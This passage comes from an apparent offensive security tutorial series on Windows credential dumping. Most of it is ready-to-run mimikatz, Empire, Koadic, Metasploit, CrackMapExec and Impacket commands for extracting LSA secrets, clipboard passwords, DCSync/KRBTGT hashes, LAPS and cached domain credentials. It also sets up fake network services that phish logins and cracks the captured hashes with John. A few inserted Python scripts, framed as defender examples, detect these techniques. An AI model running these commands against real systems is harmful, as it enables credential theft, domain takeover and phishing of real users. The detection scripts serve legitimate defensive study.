password hashes, as you can see in the image below.

The /patch parameter patches the samsrv.dll running inside lsass.exe, which displays the LM and NT
hashes. So, when you execute the following commands, it dumps the password hashes.

privilege::debug
lsadump::lsa /patch

We use mimikatz once again to get the hashes directly, without any dump file or DLL
execution; this is known as token impersonation. As you can observe, we get an error when we try
to run the following commands as a local user:

privilege::debug
lsadump::secrets

This is done by impersonating a token, which elevates our permissions to SYSTEM
(the default) or to a domain admin token if one is found; as a result, you will be able to dump the passwords in clear
text.

privilege::debug
token::elevate
lsadump::secrets

The LSA secrets are held in the registry. If services run as a local or domain user, their passwords
are stored in the registry. If auto-logon is enabled, that information is also stored in the registry.
The same can be done locally by changing permissions inside the registry. Navigate
to Computer\HKEY_LOCAL_MACHINE\SECURITY.

Expand the SECURITY key and choose Permissions from the list.

Allow "Full Control" to the Administrator user as shown.

As you can observe, this time we can see the subkeys under SECURITY.

So, once you run the following commands again, you can see the credentials in plain text as shown.

privilege::debug
lsadump::secrets

Similarly, you can use another approach that works in the same direction. Save the SYSTEM and
SECURITY registry hives with the following commands:

reg save HKLM\SYSTEM system
reg save HKLM\SECURITY security

As you can see, if you use the lsadump::secrets command without any argument you cannot
retrieve the password, but if you pass the paths of the files saved above, mimikatz
dumps the password in plain text.

privilege::debug
lsadump::secrets /system:c:\system /security:c:\security

Empire is a good penetration testing framework that works like Metasploit; you can
download it from GitHub and install it on your attacking machine to launch attacks remotely.
This is a post-exploitation module, so you first need to compromise the host machine and then use the
following module to dump the LSA secrets:

usemodule credentials/mimikatz/lsadump
execute

As a result, it dumps the saved password hashes as shown in the given image.

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other
penetration testing tools such as Meterpreter and PowerShell Empire. It allows the attacker to run
comsvcs.dll, which calls MiniDump and fetches a dump of lsass.exe to retrieve the stored NTLM
hashes. Read more from here.

use comsvcs_lsass
execute

As a result, it dumps the saved password hashes as shown in the given image.

As we all know, Metasploit is like a Swiss Army knife: it comes with multiple modules, so it allows the
attacker to execute mimikatz remotely and extract the LSASS dump to fetch the credentials. Since this is
post-exploitation, you should first have a meterpreter session on the host machine;
then load kiwi to initialise mimikatz and execute the command.

load kiwi
lsa_dump_secrets

Similarly, you can load the PowerShell extension in place of kiwi and perform the same operation; here we
use the PowerShell script version of mimikatz. This is done by executing the following commands:

load powershell
powershell_import /root/powershell/Invoke-Mimikatz.ps1
sekurlsa::logonpasswords

This dumps the password hashes as shown in the image below.

CrackMapExec is a sleek tool that can be installed with a simple apt install, and it runs very swiftly. LSA
has access to the credentials, and we exploit this fact to harvest them with this tool,
dumping the hashes as discussed previously. It requires a few things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u '[Username]' -p '[Password]' --lsa

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --lsa

In our practice, we use the Bitwarden password manager to keep our passwords secure. It is convenient
to use, and even if we forget a password we can simply copy it from there and paste it where we
need it. As you can see in the image below, we have saved our password in Bitwarden, and we
copy it from there.

If such credentials are copied by a user, we can retrieve them using various methods.
PowerShell Empire has a module for this; once you have a session through Empire, use the following
commands to execute the module:

usemodule collection/clipboard_monitor
execute

Once the module is running, whenever the copied password is pasted, as shown in the image below:

Then those credentials will be displayed in the console as shown in the image below:

In Metasploit, a meterpreter session provides you with different sets of commands.
One of them is load extapi; this command opens the door to various extra features of the
meterpreter session, all of which can be listed with a question mark (?). One feature of
extapi is its set of clipboard management commands. We use one of these commands through
extapi to dump credentials that are copied to the clipboard. For this, type:

load extapi
clipboard_monitor_start

Just like PowerShell Empire, Koadic has a built-in module for dumping clipboard data. Once you
have a session in Koadic, type the following commands to get the clipboard data:

use clipboard
execute

And this way, again, we have the credentials.

The mimikatz DCSync function allows an attacker to replicate Domain Controller (DC) behaviour.
It impersonates a domain controller and requests user credential data from other DCs via
GetNCChanges.
However, the compromised account must be a member of Administrators, Domain Admins or Enterprise Admins
to retrieve account password hashes from another domain controller. With a retrieved hash, the intruder can then
forge Kerberos tickets to obtain access to any of Active Directory's resources;
this is known as the Golden Ticket attack.

So, here we have a normal user account: at present the user Yashika is not a member of any
privileged group (Administrators, Domain Admins or Enterprise Admins).

When the attacker attempts to execute the mimikatz DCSync command to get user credentials by
requesting them from other domain controllers in the domain, it fails with the error shown in the image. This
is not possible.

So now we have granted Domain Admins rights to the user Yashika, who has thereby become a member
of the Domain Admins group, which is a privileged AD group.

We then confirmed this by listing the group details of the user Yashika and found that she
is part of the Domain Admins group.

Now let's ask for the credentials of the KRBTGT account by executing the following command in mimikatz:

lsadump::dcsync /domain:ignite.local /user:krbtgt

As a result, it retrieves the KRBTGT NTLM hash, which can be used further to conduct the very
famous Golden Ticket attack; read more about it from here.

Similarly, with the same command we can obtain the credentials of every user account in the domain.
Here, it not only requests the current hash but also retrieves the previous credentials stored for the account.

lsadump::dcsync /domain:ignite.local /user:kavish

If you want to conduct this attack remotely, PowerShell Empire is one of the best tools for a
DCSync attack. You only need to compromise a machine whose account is a member of a privileged group
(Administrators, Domain Admins or Enterprise Admins), as shown here.

Now load the following module, which invokes the mimikatz PowerShell script to execute the DCSync
attack and obtain the credentials by requesting them from another domain controller in the domain.
Here again we request the KRBTGT account hashes and, as a result, it retrieves the KRBTGT NTLM
hash.

usemodule credentials/mimikatz/dcsync_hashdump
set user krbtgt
execute

Likewise, Empire has a similar module that retrieves the hashes of all the domain's user
accounts from the domain controller.

usemodule credentials/mimikatz/dcsync_hashdump
execute

If you have a meterpreter session on a victim machine whose account is a member of Domain Admins,
you can also execute the mimikatz DCSync attack from there to obtain the users' passwords.

If your compromised account is a member of the Domain Admins group, then without wasting time
load kiwi and run the following commands:

dcsync_ntlm krbtgt
dcsync krbtgt

As a result, we found the hashes of the krbtgt account, which will help us conduct the Golden Ticket
attack further.
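Whether DCSync is driven from mimikatz, Empire, the kiwi extension, or CrackMapExec's --ntds drsuapi option earlier in this document, it is an ordinary directory replication request, so on the domain controller it surfaces as Security Event 4662 once auditing of Directory Service Access is enabled. The Properties field of that event carries the control-access-right GUIDs for DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2), DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c), and for real replication the requester is another domain controller's computer account. The following Python script is an added example for defenders, not code from the article: it checks a few constructed 4662 records for those GUIDs and reports replication requests that do not come from a known DC. The records, the DC names and the unrelated GUID are constructed; the domain IGNITE and the user yashika follow this page's walkthrough.

```python
import re

# rightsGuid values of the replication control-access rights as they appear in
# the Properties field of Event 4662 (well-known schema constants).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed inventory of the lab domain's domain controller computer accounts.
KNOWN_DCS = {"DC1$", "DC2$"}

# Constructed Event 4662 records reduced to the fields the rule needs.
# AccessMask 0x100 is "Control Access"; it is kept for realism but not keyed on.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC2$", "SubjectDomainName": "IGNITE",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "yashika", "SubjectDomainName": "IGNITE",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "yashika", "SubjectDomainName": "IGNITE",
     "ObjectType": "user", "AccessMask": "0x10",
     "Properties": "{0a1b2c3d-0000-4000-8000-000000000001}"},   # constructed, unrelated right
    {"EventID": 4662, "SubjectUserName": "WIN10-CLIENT$", "SubjectDomainName": "IGNITE",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "SubjectUserName": "yashika", "SubjectDomainName": "IGNITE"},
]

_GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}?")


def replication_rights_in(properties):
    """Return the names of replication rights whose GUIDs appear in a Properties string."""
    found = []
    for guid in _GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            found.append(name)
    return found


def classify_requester(account):
    """Known DC, some other computer account (name ends in $), or a user account."""
    if account in KNOWN_DCS:
        return "domain controller"
    if account.endswith("$"):
        return "non-DC computer account"
    return "user account"


def detect_dcsync(events):
    """Return (DOMAIN\\account, requester kind, rights) for replication requests not made by a known DC."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        who = ev.get("SubjectUserName", "")
        kind = classify_requester(who)
        if kind == "domain controller":
            continue
        alerts.append((f"{ev.get('SubjectDomainName', '')}\\{who}", kind, rights))
    return alerts


if __name__ == "__main__":
    for account, kind, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"DC replication requested by {account} ({kind}): {', '.join(rights)}")
```

The non-DC computer account case is deliberately kept as its own class: some products (Azure AD Connect accounts, for instance) legitimately hold replication rights, and those belong on an explicit allow list rather than being hidden by a blanket rule that ignores every name ending in $.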

This attack was tested on Windows Server 2016 and Windows 10; you can use the reference link
above to configure it. When you install LAPS, at some point you need to select the management tools
features to install.
Choose "Will be installed on the local hard drive" under Management Tools for the fat client UI, the
PowerShell module and the GPO Editor templates.

Further, continue with your installation and configuration with the help of the official link, and follow
the same steps on the client.

Then we ran the following commands in PowerShell, which integrate LAPS with our OU "Tech":

Import-Module AdmPwd.PS
Update-AdmPwdADSchema
Set-AdmPwdComputerSelfPermission -OrgUnit Tech
Set-AdmPwdReadPasswordPermission -OrgUnit Tech -AllowedPrincipals Administrators

Now set up a group policy for LAPS. In the GPO, go to Computer Configuration > Policies > Administrative Templates > LAPS and enable the
following settings:
• Password Settings
• Name of administrator account to manage
• Enable local admin password management

Now navigate to Active Directory Users and Computers, then select the OU for your LAPS.

NOTE: Enable the Advanced Features view as shown in the image.

Now, to ensure that it is working, let's check the password assigned by LAPS to CLIENT1 in its
properties. As you can observe in the image below, LAPS has assigned a random password
to client1.

Similarly, with the help of the LAPS application, we can search for the password of any managed machine, as we
have looked up client1's password.
I hope that by now you have understood how LAPS works and its importance in any organisation. Now
let's see how an attacker can take advantage of LAPS and dump the credentials.

On a compromised account on the DC, use the following Metasploit module to extract the LAPS
passwords of the other end-user machines.
This module recovers the LAPS (Local Administrator Password Solution) passwords configured in
Active Directory, which are usually only accessible to privileged users. Note that the local administrator
account name is not stored in Active Directory, so it is assumed to be 'Administrator' by default.

use post/windows/gather/credentials/enum_laps
post(windows/gather/credentials/enum_laps) > set session 1
post(windows/gather/credentials/enum_laps) > exploit

As a result, it dumps the password in cleartext, as shown in the image below.

The same can be done with PowerShell Empire, which allows an attacker to dump the end
users' credentials through a compromised account. It uses a PowerShell script to get the LAPS
password, with the help of the following:

usemodule credential/get_lapspasswords
execute

Similarly, it also dumps the password in cleartext; thus an attacker can access the other machines
in the network with the help of the extracted credentials.

Microsoft Windows stores previous users' logon information locally so that they can log on even if a logon
server is unreachable during later logon attempts. This is known as Domain Cached Credentials (DCC),
but it is also known as the MSCACHE or MSCASH hash. It stores a hash of the user's
password in a form that cannot be used for pass-the-hash attacks. It uses the MSCACHE
algorithm to generate the password hash, and the hashes are stored locally in the Windows registry;
by default the last 10 hashes are kept.
There are two versions of MSCASH/MSCACHE or DCC:
• MSCACHEv1 or DCC1: used before Vista / Server 2003
• MSCACHEv2 or DCC2: used after Vista / Server 2003

Metasploit helps the pen tester extract the stored hashes by reading the registry, where the MSCACHE
hashes are kept. This module uses the registry to extract the stored domain hashes that have been
cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful
logins.

use post/windows/gather/cachedump
set session 2
exploit

As a result, it dumps the password hashes fetched from the DCC2/MSCACHE store, as shown
in the image below.

This hash can also be extracted with the Python Impacket libraries; this requires the SYSTEM and SECURITY hives
stored in the registry. With the help of the following commands, you can export these hives from
the registry and save them on the local machine.

reg save hklm\system c:\system
reg save hklm\security c:\security

Next, copy the system and security files to the platform where Impacket is installed; in our case we
copied them to Kali Linux and used the following command to extract the DCC2/MSCACHE hashes:

python secretsdump.py -security -system system LOCAL

Boom!!!! You will get the DCC2/MSCACHEv2 hashes on your screen.
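The reg save commands just used, the same ones in the LSA secrets section, and the ProcDump and comsvcs.dll one-liners in the LSA chapter all leave a distinctive command line in process-creation telemetry (Windows Security Event 4688 with command-line auditing enabled, or Sysmon Event ID 1). The following Python script is an added example for defenders, not code from the article: it normalises a few constructed command lines (quotes stripped, case folded, whitespace collapsed, since attackers vary all three) and matches them against patterns for registry hive export and LSASS memory dumping as shown on this page. The rules and the sample records are constructed.

```python
import re

# Each rule: (name, pattern). Patterns are matched against a normalised command
# line: lower-cased, quotes removed, runs of whitespace collapsed to one space.
RULES = [
    ("registry hive export (SAM/SECURITY/SYSTEM)",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b")),
    ("lsass dump via comsvcs.dll MiniDump",
     re.compile(r"rundll32(?:\.exe)?\s+.*comsvcs\.dll\s*,\s*minidump\b")),
    ("lsass dump via procdump",
     re.compile(r"procdump(?:64)?(?:\.exe)?\s+.*-ma\s+lsass(?:\.exe)?\b")),
]

# Constructed process-creation records: (process id, command line) as they might
# appear in Security Event 4688 or Sysmon Event 1 after extraction.
SAMPLE_COMMAND_LINES = [
    (4120, r"reg save HKLM\SYSTEM system"),
    (4121, r'"C:\Windows\System32\reg.exe"  SAVE  hklm\security c:\security'),
    (4132, r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    (4140, r".\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 492 C:\mem.dmp full"),
    (4155, r"procdump.exe -accepteula -ma lsass.exe mem.dmp"),
    (4160, r"rundll32.exe shell32.dll,Control_RunDLL"),
]


def normalise(command_line):
    """Lower-case, strip quotes and collapse whitespace so the simple patterns hold."""
    stripped = command_line.replace('"', "").replace("'", "")
    return " ".join(stripped.lower().split())


def classify(command_line):
    """Return the name of the first rule that matches, or None if nothing does."""
    text = normalise(command_line)
    for name, pattern in RULES:
        if pattern.search(text):
            return name
    return None


def scan(records):
    """Return [(pid, rule name, command line)] for every record that matched a rule."""
    hits = []
    for pid, command_line in records:
        name = classify(command_line)
        if name:
            hits.append((pid, name, command_line))
    return hits


if __name__ == "__main__":
    for pid, name, cmd in scan(SAMPLE_COMMAND_LINES):
        print(f"pid {pid}: {name}: {cmd}")
```

Command-line matching is cheap and precise for the exact tools shown here, but it is the weaker of the two checks: a renamed binary or a different dumping API will not match, which is why the LSASS handle-access rule in the LSA chapter is the one to rely on, with this as a high-fidelity supplement.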

As we all know, mimikatz is one of the best penetration testing tools for credential dumping on Windows.
So, we can get the DCC2/MSCACHEv2 hashes using mimikatz by installing it on a compromised host and
executing the following commands:

privilege::debug
token::elevate
lsadump::cache

And again, you will get the MSCACHEv2 hashes on your screen.

Moving to our next technique, PowerShell Empire has a module that extracts the MSCACHEv2 hashes
from the registry of the compromised machine. So, download and run Empire on your local
machine, compromise the host once so that you can use the Empire post module, and then type as
follows:

usemodule credentials/mimikatz/cache
set agent <agent_id>
execute

And again, you will get the MSCACHEv2 hashes on your screen.

Just like PowerShell Empire, you can use Koadic to extract the DCC2 hashes. You can read more
about Koadic from here. Run the following module to get the hashes:

use mimikatz_dotnet2js
set MIMICMD lsadump::cache
execute

And again, you will get the MSCACHEv2 hashes on your screen.

Just like Impacket, you can download the MSCACHEv2 Python script to extract the stored hashes.
Download the script from GitHub and then use the security and system files (as discussed in the Impacket section):

python mscache.py --security /root/Desktop/security --system /root/Desktop/system

And again, you will get the MSCACHEv2 hashes on your screen.

As we know, these hashes cannot be used for a pass-the-hash attack, so we need to use John the Ripper
to crack them before they can be used.

john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt mhash

As a result, it has recovered the password in clear text for the given hash file. So don't get confused
between DCC2, MSCACHEv2 and MSCASH hashes: these are all the same thing, and you can use the above-
discussed methods to extract them.
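This page cracks NT hashes with John's NT format (in the NTDS chapter) and DCC2/MSCACHEv2 hashes with its mscash2 format (here), and states that DCC2 hashes cannot be passed. Both follow from how the two values are derived, which the following Python script demonstrates as an added example (it is not code from the article, from mimikatz or from John): an NT hash is MD4 over the UTF-16LE password with no salt, so it is identical on every machine and can be replayed; a DCC2 value is PBKDF2-HMAC-SHA1 over the NT hash bound to the lower-cased username, with 10240 iterations by default, so it is per-user and deliberately slow to test. Because the md4 algorithm is not available from hashlib on OpenSSL 3 builds, the script carries its own compact MD4. The passwords and usernames are constructed (Ignite@987 is the lab password used on this page).

```python
import hashlib
import struct


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Plain RFC 1320 MD4 (hashlib's md4 is missing on OpenSSL 3 builds)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", bit_len)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # (round function, additive constant, shift schedule, message word order)
    rounds = [
        (f, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for chunk in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[chunk:chunk + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate so the next step updates the old d
        a = (a + aa) & 0xFFFFFFFF
        b = (b + bb) & 0xFFFFFFFF
        c = (c + cc) & 0xFFFFFFFF
        d = (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE password, unsalted, so identical on every machine."""
    return md4(password.encode("utf-16-le"))


def dcc1(password: str, username: str) -> bytes:
    """MSCACHEv1 / DCC1: MD4(NT hash || UTF-16LE(lower-cased username))."""
    return md4(nt_hash(password) + username.lower().encode("utf-16-le"))


def dcc2(password: str, username: str, iterations: int = 10240) -> bytes:
    """MSCACHEv2 / DCC2: PBKDF2-HMAC-SHA1(DCC1, salt = lower-cased username, 16 bytes)."""
    salt = username.lower().encode("utf-16-le")
    return hashlib.pbkdf2_hmac("sha1", dcc1(password, username), salt, iterations, 16)


def dcc2_john_line(password: str, username: str, iterations: int = 10240) -> str:
    """Render DCC2 as $DCC2$<iterations>#<user>#<hex>, the form John's mscash2 format reads."""
    return f"$DCC2${iterations}#{username.lower()}#{dcc2(password, username, iterations).hex()}"


if __name__ == "__main__":
    pw = "Ignite@987"                      # constructed lab password from this page
    print("NT hash :", nt_hash(pw).hex())  # same value wherever this password is used
    for user in ("Administrator", "raj"):  # DCC2 differs per user for the same password
        print(dcc2_john_line(pw, user))
```

The two properties the page relies on are visible in the output: the NT hash of a given password never changes, which is what makes it replayable, while the DCC2 line for the same password differs per username and costs 10240 HMAC rounds per guess, which is why cracking it with a wordlist is the only route and why the iteration count matters.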

In Metasploit, by making use of auxiliary modules, you can fake any server of your choice and capture the
victim's credentials. To find the module for the server you want to imitate, use the search command. So, to get
started, switch on your Kali Linux machine and start Metasploit using
the command:

msfconsole

FTP stands for File Transfer Protocol; it is used to transfer files between a client and a
server on a network and runs on port 21. This module provides a fake FTP service that is designed to
capture authentication credentials.
To achieve this, type:

msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/ftp) > set banner Welcome to Hacking Articles
msf5 auxiliary(server/capture/ftp) > exploit

Here you can see that the server has started and the module is running.

On running an Nmap scan against the FTP port and IP address, you can see that the port is open.

nmap -p21 <ip address>
ftp 192.168.0.102

Now, to lure the user into believing it is a genuine login, you trick the user into opening
the FTP login. It displays 'Welcome to Hacking Articles' and asks the user for a user
ID and password.
To the user it looks like a genuine login, so they enter their user ID and password.

The user is shown that the login failed, but the user ID and password have been captured by the
listener.
You can see that the ID/password is:

raj/123

Telnet is a network protocol that allows a user on one computer to log into another computer that
is part of the same network; it runs on port 23. This module provides a fake Telnet service that is designed to
capture authentication credentials.
To achieve this, type:

msf5 > use auxiliary/server/capture/telnet
msf5 auxiliary(server/capture/telnet) > set banner Welcome to Hacking Articles
msf5 auxiliary(server/capture/telnet) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/telnet) > exploit

On running an Nmap scan against the Telnet port and IP address, you can see that the port is open.

nmap -p23 <ip address>
telnet 192.168.0.102

Now, to lure the user into believing it is a genuine login, you trick the user into opening
the Telnet login. It displays 'Welcome to Hacking Articles' and asks the user for a
user ID and password.
To the user it looks like a genuine login, so they enter their user ID and password.

The user is shown that the login failed, but the user ID and password have been captured by the
listener.
You can see that the ID/password is:

ignite/123

VNC (Virtual Network Computing) is a graphical desktop sharing system that uses the Remote Frame
Buffer protocol to remotely control another computer; it runs on port 5900. This module provides a fake VNC
service that is designed to capture authentication credentials.
To achieve this, type:

msf5 > use auxiliary/server/capture/vnc
msf5 auxiliary(server/capture/vnc) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/vnc) > set johnpwfile /root/Desktop/
msf5 auxiliary(server/capture/vnc) > exploit

Here we use the JOHNPWFILE option to save the captured hashes in John the Ripper format. We can see
that the module is running and the listener has started.

On running an Nmap scan against the VNC port and IP address, you can see that the port is open.

nmap -p5900 <ip address>
vncviewer 192.168.0.102

To the user it looks like a genuine server, so on starting vncviewer they enter their user ID and
password.

It shows an authentication failure, but the hash of the password has been captured.

SMB stands for Server Message Block; it is used to share printers, files etc. and runs on port 445. This module
provides an SMB service that can be used to capture the challenge-response password hashes of
SMB client systems.
To achieve this, type:

msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /root/Desktop/
msf5 auxiliary(server/capture/smb) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/smb) > exploit

The server captures the credentials as a hash value that can be cracked later, which is why the
JOHNPWFILE option is set to store them in John the Ripper format.

On doing an Nmap scan of the SMB port and IP address, you can see that the port is open

nmap -p445 <ip address>

As a result, this module will now generate a spoofed Windows security prompt on the victim's system
when it tries to establish a connection with another system to access that system's shared folders.



It will show the user a login failure, but the credentials will be captured by the listener. Here
you can see that the listener has captured the user and the domain name. It has also generated an NT
hash which can be cracked with John the Ripper.

Here you can see that the hash file generated on the desktop can be cracked using

john _netntlmv2

And here you see that the password is in plain text: 123 for user Raj.



This module responds to all requests for resources with an HTTP 401. This should cause most browsers
to prompt for a credential. If the user enters Basic Auth credentials, they are sent to the console.
This may be helpful in some phishing expeditions where it is possible to embed a resource into a page.
To exploit HTTP (80), you can type

msf5 > use auxiliary/server/capture/http_basic
msf5 auxiliary(server/capture/http_basic) > set RedirectURL www.hackingarticles.in
msf5 auxiliary(server/capture/http_basic) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/http_basic) > set uripath sales
msf5 auxiliary(server/capture/http_basic) > exploit

As a result, this module will now generate a spoofed login prompt on the victim’s system when an
HTTP URL is opened.



It will show the user that the login has failed, but the user ID and password will be captured by the
listener.
You can see that the ID/password is Raj/123



POP3 is a client/server protocol in which e-mail is received and held for you by your Internet server
on port 110. This module provides a fake POP3 service that is designed to capture authentication
credentials.
To achieve this, you can type

msf5 > use auxiliary/server/capture/pop3
msf5 auxiliary(server/capture/pop3) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/pop3) > exploit

On doing an Nmap scan of the POP3 port and IP address, you can see that the port is open

nmap -p110 <ip address>

telnet 192.168.0.102 110

Believing it to be a genuine service, the user will enter his user ID and password.

You can see that the user/password captured by the listener is raj/123



SMTP stands for Simple Mail Transfer Protocol, a communication protocol for electronic mail
transmission on port 25. This module provides a fake SMTP service that is designed to capture
authentication credentials.
To achieve this, you can type

msf5 > use auxiliary/server/capture/smtp
msf5 auxiliary(server/capture/smtp) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/smtp) > exploit

On doing an Nmap scan of the SMTP port and IP address, you can see that the port is open

nmap -p25 <ip address>

telnet 192.168.0.102 25

Believing it to be a genuine service, the user will enter his user ID and password.

On entering the ID and password, the user is shown a server error, but the credentials are captured by
the listener: raj:123



PostgreSQL is an open-source database that is widely available on port 5432. This module provides a
fake PostgreSQL service that is designed to capture clear-text authentication credentials.

msf5 > use auxiliary/server/capture/postgresql
msf5 auxiliary(server/capture/postgresql) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/postgresql) > exploit

On doing an Nmap scan of the PostgreSQL port and IP address, you can see that the port is open

nmap -p5432 <ip address>

psql -h 192.168.0.102 -U raj

Believing it to be a genuine service, the user will enter his user ID and password.

On entering the ID and password, the user is shown a server error, but the credentials are captured by
the listener: raj/123.



MSSQL is a Microsoft-developed database management system that is widely available on port 1433. This
module provides a fake MSSQL service that is designed to capture authentication credentials. The
module supports both the weakly encoded database logins and Windows logins (NTLM).
To achieve this,

msf5 > use auxiliary/server/capture/mssql
msf5 auxiliary(server/capture/mssql) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/mssql) > exploit

It will open a fake Microsoft session manager window. Believing it to be a genuine page, the user will
enter his user ID and password.

On entering the ID and password, the user is shown a server error, but the credentials are captured by
the listener.



The http_ntlm capture module tries to quietly catch the NTLM challenge hashes over HTTP.

msf5 > use auxiliary/server/capture/http_ntlm
msf5 auxiliary(server/capture/http_ntlm) > set johnpwfile /root/Desktop
msf5 auxiliary(server/capture/http_ntlm) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/http_ntlm) > set uripath report
msf5 auxiliary(server/capture/http_ntlm) > exploit

As a result, this module will now generate a spoofed login prompt on the victim's system when an
HTTP URL is opened.

It will show the user a logon failure, but the credentials will be captured by the listener. Here
you can see that the listener has captured the user and the domain name. It has also generated an NT
hash which can be cracked with John the Ripper.



And here you see that the generated hash file can be cracked using john _netntlmv2.
And here you see that the password is in plain text: 123 for user Raj.

MySQL is an open-source database management system on port 3306. This module provides a fake MySQL
service that is designed to capture authentication credentials. It captures challenge and response
pairs that can be supplied to John the Ripper for cracking.
To achieve this,

msf5 > use auxiliary/server/capture/mysql
msf5 auxiliary(server/capture/mysql) > set srvhost 192.168.0.102
msf5 auxiliary(server/capture/mysql) > exploit

On doing an Nmap scan of the MySQL port and IP address, you can see that the port is open

nmap -p3306 <ip address>

mysql -h 192.168.0.102 -u root -p

Believing it to be a genuine service, the user will enter his user ID and password.

You can see that the user/password captured by the listener is 1234



Autologon helps you conveniently customize the built-in autologon mechanism of Windows.
Rather than waiting for a user to enter their name and password, Windows will automatically log in
the chosen user with the credentials you submit to Autologon, which are stored encrypted in the
registry.
In this post, we will try to dump the stored autologon credentials with the help of two different tools.
Let's look at the settings for autologon. First, you need to open the User Accounts control panel by
running the netplwiz command from the Run prompt.

Choose the account for autologon, for example, we have selected user Raj.

Enter your password once and then a second time to confirm it and uncheck the box “Users must
enter a user name and password to use this computer” then click OK.



Network Password Recovery is very easy to use: install and run the tool on the local machine whose
password you want to extract. It will dump the stored credentials for the autologon account.
You can download this tool from here



This tool can extract/decrypt the password that was stored in the LSA by Sysinternals Autologon.
You can download its compiled version HERE
Run the downloaded .exe as shown in the given image; it will dump the password in plain text.

• https://www.hackingarticles.in/credential-dumping-wireless/
• https://www.hackingarticles.in/credential-dumping-group-policy-preferences-gpp/
• https://www.hackingarticles.in/credential-dumping-windows-credential-manager/
• https://www.hackingarticles.in/credential-dumping-wdigest/
• https://www.hackingarticles.in/credential-dumping-security-support-provider-ssp/
• https://www.hackingarticles.in/credential-dumping-sam/
• https://www.hackingarticles.in/credential-dumping-applications/
• https://www.hackingarticles.in/credential-dumping-ntds-dit/
• https://www.hackingarticles.in/credential-dumping-phishing-windows-credentials/
• https://www.hackingarticles.in/credential-dumping-local-security-authority-lsalsass-exe/
• https://www.hackingarticles.in/credential-dumping-clipboard/
• https://www.hackingarticles.in/credential-dumping-dcsync-attack/
• https://www.hackingarticles.in/credential-dumpinglaps/
• https://www.hackingarticles.in/credential-dumping-domain-cache-credential/
• https://www.hackingarticles.in/credential-dumping-fake-services/
• https://www.hackingarticles.in/credential-dumping-windows-autologon-password/
